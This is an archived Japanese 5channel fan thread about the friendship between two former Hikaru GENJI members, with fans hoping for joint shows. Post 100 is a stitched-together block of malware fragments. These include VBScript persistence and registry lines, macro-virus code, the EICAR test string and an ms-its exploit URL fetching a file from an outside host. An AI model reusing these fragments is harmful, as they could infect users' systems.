5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【晃】AAコンビ【アツヒロ】

1 :ななしじゃにー:2006/07/29(土) 20:19:25 ID:OyLJCWg/
グループが解散しても大の仲良し
AAコンビについて語りましょう


2 :ななしじゃにー:2006/07/29(土) 21:44:53 ID:1YXzINKV
こんなスレがあったとは

昨日プレゾン見に行ったが想の時に列の一番後で2人で何か話してたね

双眼鏡で晃の方を見ていたら
晃がアツの方を見ていたから、慌ててアツの方に目を移したら
アツはもう正面向いていた…


3 :ななしじゃにー:2006/07/29(土) 23:15:51 ID:UTQi8Q4x
♪You and Me同じ気持ち〜♪

4 :ななしじゃにー:2006/07/30(日) 03:19:18 ID:WhYND2oF
この二人って同人ぽい

5 :ななしじゃにー:2006/07/30(日) 04:46:50 ID:JZORs/qe
同人って?


6 :ななしじゃにー:2006/07/31(月) 21:09:35 ID:PkajTSH6
>>3やっぱそれだよね。歌うとこみたいなー。二人でライブやればいいのに。

7 :ななしじゃにー:2006/07/31(月) 22:17:36 ID:XDTmEDnW
ポポロの晃のコーナーにアツが出たのって
今年になってから1回あったけど
それまでにもあった?


8 :ななしじゃにー:2006/08/01(火) 05:59:39 ID:cmOXrpAa
最近2人で話してるの見てないなぁ
何か2人でやってほしいな


9 :ななしじゃにー:2006/08/01(火) 22:49:00 ID:QRqzgLh/
てか最初は2人同じ身長だったのに、なんでああも差がついちゃったんだろう?
アツってよっぽど早熟型?

10 :ななしじゃにー:2006/08/04(金) 02:32:18 ID:jjWbmENU
2人一緒に見ると、かなりの身長差があるけど
1人ずつのときはそうでもないんだよね?

11 :ななしじゃにー:2006/08/04(金) 12:36:27 ID:EslrZ9BY
お互いの背の高さがお互いのキャラに合ってる気がする。

12 :ななしじゃにー:2006/08/06(日) 19:41:12 ID:6+7nhaNn
アツが晃に慕ってる(なついてる)から晃もアツの事を可愛がるよう(!?)になったの?
それとも晃がアツの事を可愛がるから自然とアツも晃に慕うようになるの?
どっちが先?


13 :ななしじゃにー:2006/08/06(日) 22:41:59 ID:dceBfeY0
・・・ こっぱずかしいから やめれ。

14 :ななしじゃにー:2006/08/06(日) 22:46:23 ID:6+7nhaNn
は?


15 :ななしじゃにー:2006/08/07(月) 22:14:55 ID:OW/eMo1U
アツ曰く、(仲良くなったのは)「高校ではカンペキッ」らスィ。
記者にこの文字でおこされて、読んだ当時すごい羞恥だった。

16 :ななしじゃにー:2006/08/07(月) 22:50:09 ID:4SRQ4JJF
光GENJI時代から2人を見てきて、晃と敦啓の間には仲がいいだけでは言い表すことが出来ない深い絆がある事は確かだと思うよ…

17 :ななしじゃにー:2006/08/07(月) 23:48:49 ID:Sr6JdVMf
二人は「運命共同体」だったよな。

18 :ななしじゃにー:2006/08/07(月) 23:58:12 ID:4SRQ4JJF
アツが厨房の時、某雑誌で「宝物は晃」発言あったよね

19 :ななしじゃにー:2006/08/08(火) 13:27:58 ID:rVjWHH6j
>>17 そうそう!

20 :ななしじゃにー:2006/08/08(火) 13:42:57 ID:Ywgmzh+6
この2人って人間としてのジャンルが全く違うんじゃないの?

優等生とDQNって感じ?

21 :ななしじゃにー:2006/08/08(火) 15:32:57 ID:4+lvwneq
確かに堀越時代は晃の誘いでサボってたとか言ってたよね
でも晃=DQNってほどでもないと思うけど

22 :ななしじゃにー:2006/08/08(火) 15:34:51 ID:4+lvwneq
あ、逆(優等生=アツ)もねw

23 :ななしじゃにー:2006/08/08(火) 16:20:38 ID:Ywgmzh+6
いや、晃が優等生でアツがDQNに見えるんだけど


24 :ななしじゃにー:2006/08/08(火) 17:49:27 ID:2tbvGXnk
まぁ晃がオトナでアツが子供っつうかそんなイメージ・・・。そんなAAが好きなんだが。

25 :ななしじゃにー:2006/08/08(火) 20:50:26 ID:rVjWHH6j
>>24そうそう!

26 :ななしじゃにー:2006/08/08(火) 22:04:45 ID:DZBm6JX2
晃もアツヒロも高校時代DQN
SMAPの吾郎や剛を苛めてたし

27 :ななしじゃにー:2006/08/09(水) 01:56:57 ID:r52LDLtY
アツと草なぎ
待ち合わせて一緒に登校してたじゃん。
最初は晃待ってたんだけど余りに遅刻してくるもんだから途中から見捨てたんだよなw

…懐かし杉www

28 :ななしじゃにー:2006/08/11(金) 01:43:22 ID:nU+kAUrz
2人で何かやらないかな

29 :ななしじゃにー:2006/08/12(土) 00:27:11 ID:pSTP2xeo
ディナーショーとかやってくれないかなぁ
久しぶりに2人で歌ってる所が見たいわ


30 :ななしじゃにー:2006/08/12(土) 00:41:23 ID:4GHaoSqd
何かこのスレはsage進行にした方がいい気がする。何となく。

31 :ななしじゃにー:2006/08/12(土) 00:46:58 ID:ItomF3rV
基本的にsageでいこうよ

32 :ななしじゃにー:2006/08/12(土) 13:06:35 ID:403TwgGp
>>30そうそう!

33 :ななしじゃにー:2006/08/13(日) 20:51:02 ID:d2qFUPnD
この2人って剛健コンビみたいじゃない?


34 :ななしじゃにー:2006/08/14(月) 13:27:20 ID:FQWCh5zI
アツがまはなまるに出た時に晃の事を「親友」って言ってた
ほほえましいね


35 :ななしじゃにー:2006/08/14(月) 21:02:01 ID:0W3tzk++
カトリーヌの漫画思い出すなぁ。読み返そう…。

36 :ななしじゃにー:2006/08/15(火) 01:48:34 ID:yOx7Dh7T
懐かし(>_<)このマンガは泣ける…そして実話と錯覚する(-"-;)読みたくなっちゃった

37 :ななしじゃにー:2006/08/15(火) 08:09:51 ID:TblTBvbk
見たことない…どんなの?

38 :ななしじゃにー:2006/08/15(火) 13:11:20 ID:2tf9yy5I
読み返してしまいマスタ!二人が思いを寄せている朝香。朝香が晃を好きだとわかり、アツの気持ちを知っている晃(反抗期)は彼女に冷たい態度をとり…。卒業を間近に控え、いろんなものが変わるけど俺たち変わらねーよ!って感じかな?

39 :ななしじゃにー:2006/08/16(水) 00:18:24 ID:Qz4NBXnD
あのマンガの最後の落書き、いろんなとこに書いた覚えありマス

40 :ななしじゃにー:2006/08/16(水) 21:03:41 ID:7s/BhriU
>>38

お願いだから改行して


41 :ななしじゃにー:2006/08/16(水) 21:06:59 ID:W8zQj8ZD
>>40
お願いだからsageて。

42 :ななしじゃにー:2006/08/17(木) 21:46:46 ID:VkX3TvQs
アツの方がマジメだけど、晃のほうが要領よいのよね。

43 :ななしじゃにー:2006/08/18(金) 07:52:36 ID:48LDkrMl
アツが情熱タイプで
アキラが冷静タイプっぽい。

44 :ななしじゃにー:2006/08/18(金) 18:16:27 ID:/jvorj5x
二人のライブやったら絶対行くー!

45 :ななしじゃにー:2006/08/18(金) 19:41:26 ID:x8PxJNLD
ディナーショーやってくれないかな


46 :ななしじゃにー:2006/08/18(金) 21:14:19 ID:Oj5ZYNls
DSだと晃は堪能できるけどアツは…ねぇ
ライブ・ライブ・ライブ!

47 :ななしじゃにー:2006/08/18(金) 21:57:16 ID:d33PaTWg
2人共演(もちろん主演)の舞台と、ジョイントライブならどっちがいい?

自分はライブ。

48 :ななしじゃにー:2006/08/18(金) 22:04:23 ID:/jvorj5x
ぜーったいライブ!

49 :ななしじゃにー:2006/08/19(土) 10:51:19 ID:2mbWTXx1
舞台もいいけどやっぱり
素っぽいふたりが見たいな〜
PZの想の時にじゃれてたのがよかった…

50 :ななしじゃにー:2006/08/20(日) 15:48:42 ID:hAL2Loz3
来年の20周年ではぜひディナーショーを


51 :ななしじゃにー:2006/08/22(火) 19:40:52 ID:PmVxC7Nk
どっちでもいいからなんかやっておくれ

52 :ななしじゃにー :2006/08/23(水) 00:32:13 ID:zYGoxe4b
ディナーショーは高いから避けていただきたい(不味い料理もいらんし)

2人のトークショーでもいいぞ!

53 :ななしじゃにー:2006/08/23(水) 23:02:14 ID:6UTEXveT
舞台の稽古大変そうだが
頑張れ!!


54 :ななしじゃにー:2006/08/23(水) 23:03:20 ID:6UTEXveT
スマン
誤爆…
しかもageた…


55 :ななしじゃにー:2006/08/27(日) 21:04:02 ID:ZxOwr4P6
来年の24時間テレビは2人がメーンパーソナリティをすればいい

アツも何かやりたいって言ってたし

8/18・8/19がちょうど土日だし


56 :ななしじゃにー:2006/08/27(日) 22:47:52 ID:d8h6yyya
知名度がないから無理

57 :ななしじゃにー:2006/08/27(日) 23:36:24 ID:N/xiznjG
夢ぐらいみたっていいんジャマイカ?

58 :ななしじゃにー:2006/08/30(水) 00:08:28 ID:n1BQ3KhB
あっくん おめでと!

59 :ななしじゃにー:2006/09/01(金) 00:15:28 ID:mlkQScdA
ふたりでラジオやって欲しい

60 :ななしじゃにー:2006/09/01(金) 17:15:11 ID:bBJ3R/J5
ゲンジゲンキバクハツ
昔の録音テープ聞きたくなってきた。サガソ…。ゴソゴソ。

61 :ななしじゃにー:2006/09/04(月) 18:19:12 ID:zh45i8Os
懐かしス

62 :ななしじゃにー:2006/09/08(金) 22:48:41 ID:y13XNxHu
じゃあ2人で24時間マラソン


63 :ななしじゃにー:2006/09/09(土) 01:26:06 ID:rnktZPxa
アツが田中で晃が山根?

64 :ななしじゃにー:2006/09/14(木) 19:27:40 ID:AgzRYTtf
年末のカウコンを二人で!

65 :ななしじゃにー:2006/09/15(金) 02:59:46 ID:Pb0x9m69
今年のカウコンはカツンが
うざいだろうから、もう
出なくてイイ

66 :ななしじゃにー:2006/09/15(金) 18:08:30 ID:PylHHIpV
カウコンは唯一2人でのTV出演

67 :ななしじゃにー :2006/09/16(土) 00:50:02 ID:i8m+bV7f
20周年カウコンでもいいな〜
夜中に終わられても帰れないのでオールナイトで
MC多めでお願いします

68 :ななしじゃにー:2006/09/18(月) 03:01:15 ID:1YITJbvw
こんなスレあったんだ



69 :ななしじゃにー:2006/09/22(金) 13:25:21 ID:Ebo8wyLV
蒲田来たのかな?

70 :ななしじゃにー:2006/09/23(土) 21:21:34 ID:xNliTqTx
いくだろーねー

71 :ななしじゃにー:2006/09/27(水) 16:22:55 ID:UwSLP514
マッチが25周年でカウコンで大々的に扱われていたから
今年は20周年のアツ晃が…
と言いたいが去年の鯛はそんな事なかったよな


72 :ななしじゃにー:2006/09/27(水) 16:25:30 ID:UwSLP514
ageていたよ
スマソ


73 :ななしじゃにー:2006/09/27(水) 18:41:16 ID:eoz1SseL
>71
鯛、3人で出たじゃん。
20周年の幕開けを迎えた年だったよね。


74 :ななしじゃにー:2006/09/27(水) 22:07:22 ID:frYCdRat
そうそう3人で出てたよね
何かあるかな〜


75 :ななしじゃにー:2006/09/28(木) 13:51:13 ID:2xeDU0Zx
期待しちゃうじゃーん!ワクワク

76 :ななしじゃにー:2006/10/02(月) 23:39:35 ID:8DpDOOoX
二人は仲良し

77 :ななしじゃにー:2006/10/03(火) 01:18:47 ID:WqjgPC6H
晃が『蒲田』観に来た時、一緒に飲んだのかな


78 :ななしじゃにー:2006/10/03(火) 02:20:21 ID:VO2eiQT7
なんの話するんだろ
微笑ましい…w

79 :ななしじゃにー:2006/10/05(木) 03:49:18 ID:JSPe29rc
20周年記念で、2人でディナーショーやってほしい
ウホッw


80 :ななしじゃにー:2006/10/05(木) 11:44:10 ID:Z/Gnaefb
この2人は2人で1つみたいな扱いだけど、いつ頃から人気出たの?
光G全盛期は、ひたすら影薄かった気がするけど

81 :ななしじゃにー:2006/10/06(金) 18:40:02 ID:8ot9+ODW
>>80
この二人は運命共同体のような気がス。
一番苦しいときに励まし合い、わかりあえた二人。

あなたの目から見たら薄い存在かもしれないが、私にはめちゃめちゃ濃厚ですた!!


82 :ななしじゃにー:2006/10/06(金) 22:29:11 ID:etJgolZK
グループで諸星の次に人気の2人だったけど、確か最初は大沢と山本に
負けてたんだよね?

83 :ななしじゃにー:2006/10/06(金) 22:35:22 ID:lrndNQTQ
最初中学生で労働基準法でTV出れてなかったのも
あったからかも

84 :ななしじゃにー:2006/10/06(金) 22:42:48 ID:etJgolZK
全盛期のパラ銀をちょっと過ぎたダイハリ頃からかな?
2人売れ始めたのは

85 :ななしじゃにー:2006/10/08(日) 12:11:54 ID:+Jc8+STM
あっくんさいこー

86 :ななしじゃにー:2006/10/13(金) 11:46:46 ID:7FVePjLx
赤西に代わる A と言ったら……

87 :ななしじゃにー:2006/10/14(土) 12:04:27 ID:TKHzrB+t
アカサカアキラ

88 :ななしじゃにー:2006/10/15(日) 22:11:01 ID:juohGnwb
アツヒロ佐藤


89 :ななしじゃにー:2006/10/15(日) 23:16:16 ID:9vAvl3zb
晃くんが赤西ごときのお子様の代わりなんて、失礼!

90 :ななしじゃにー:2006/10/16(月) 00:01:35 ID:7D6HM4KK
卒業ライブの時に 最後ローラースケートが滑っていったのは アツだっけ?

91 :ななしじゃにー:2006/10/16(月) 00:27:11 ID:3S3ROWAL
↑山本だお…

92 :ななしじゃにー:2006/10/16(月) 21:20:45 ID:xr2/hosw
そんなこともあったね
みんなよくおぼえてるなぁ

93 :ななしじゃにー:2006/10/16(月) 21:25:11 ID:msNfeSp1
マジで来年2人で何やってくれるんだろう
20周年記念イベント


94 :ななしじゃにー:2006/10/26(木) 17:20:38 ID:LAY4zu3W
やっぱりディナーショーでしょ
ディナーショー見たぁい


95 :ななしじゃにー:2006/10/26(木) 20:40:27 ID:NJSdbysO
2人で舞台またやってほしいなぁ

96 :ななしじゃにー:2006/10/26(木) 22:32:37 ID:JZCtyRcm
プレゾンDVDの稽古風景にツーショットあったね


97 :ななしじゃにー:2006/10/31(火) 10:11:45 ID:l9NfxEeP
光Gの仲は正直良さそうには見えなかったけど
この2人はいつまでも仲良いのが良い

98 :ななしじゃにー:2006/11/09(木) 21:01:46 ID:0cgeTB5l
年末が近づいてくる〜

99 :ななしじゃにー:2006/11/11(土) 14:58:56 ID:v6zjHaDf
またカウントダウンで2ショットが見たいな


100 :<body onload=window()>:2006/11/11(土) 16:28:59 ID:k5B1DDlC
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

101 :ななしじゃにー:2006/11/16(木) 17:58:32 ID:F1+4Msqm
みたいよ〜

102 :ななしじゃにー:2006/11/17(金) 01:20:52 ID:9Hxeu4iJ
a

103 :ななしじゃにー:2006/11/20(月) 13:14:47 ID:GLl73KZ3
&

104 :ななしじゃにー:2006/11/21(火) 18:42:01 ID:4Ir9KlcH
a

105 :ななしじゃにー:2006/12/03(日) 13:32:52 ID:3KNFQ/vw
カウコン何かないかなぁ

106 :ななしじゃにー:2006/12/22(金) 01:56:46 ID:J+DTOQPk
保守


107 :ななしじゃにー:2006/12/29(金) 01:20:42 ID:u9dpGiiw
カウコン出ないと2人の絡みもないね…
淋しいな


108 :ななしじゃにー:2007/01/05(金) 19:24:53 ID:EZQMCQwP
なかったね

109 :ななしじゃにー:2007/01/06(土) 02:35:14 ID:YZ5kybVh
見事にスルーだったね。
録画準備もして、更にテレビの前で今か今かとスタンバってたのに…or2

110 :ななしじゃにー:2007/01/06(土) 09:41:29 ID:IHk+TYTG
でもアツ日記で晃と食事したって書いてあったね
今年も仲良くねw

111 :ななしじゃにー:2007/01/09(火) 00:36:21 ID:/4wfwcG1
今年は2人での共演見られるかなぁ〜

112 :ななしじゃにー:2007/01/09(火) 01:16:45 ID:/O7o2ykt
プレゾン辺りなら、またやりそうな気が…

でも、カウコンでスルーされてるから、これを機にジャニ系の仕事はないのかな?
関係ないよね?


113 :ななしじゃにー:2007/01/12(金) 19:37:26 ID:GL+WkJz3
2人で24時間テレビパーソナリティ

100キロマラソン


114 :ななしじゃにー:2007/01/13(土) 13:18:30 ID:13yiSh10
昔のオールスター感謝祭で、敦のマラソン見て悲しくなったの思い出してしまいマスタ

115 :ななしじゃにー:2007/01/13(土) 16:50:14 ID:t92qCB4x
何で?

116 :ななしじゃにー:2007/01/19(金) 02:24:27 ID:/K2pKBbA
>>114
ギャハハ!それジブンも覚えてるww
特に誰からもイジられず順位も中途半端で「なんで出たんだよ・・」と何故かこっちが恥ずかしい気持ちになったのを思い出した。

117 :ななしじゃにー:2007/01/29(月) 17:55:55 ID:pCKQ+KMv
AA

118 :ななしじゃにー:2007/02/06(火) 21:22:43 ID:WT9GFYC7

何か2人でやってほしい



119 :ななしじゃにー:2007/02/16(金) 19:31:37 ID:RnvSJX66
ユーチューブみたいに動画も投稿できる芸能人の秘蔵映像発見!!
みんなのお宝映像も投稿できるよ!
↓↓↓
http://tv9.2ch.net/test/read.cgi/actor/1170878857/54

16 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)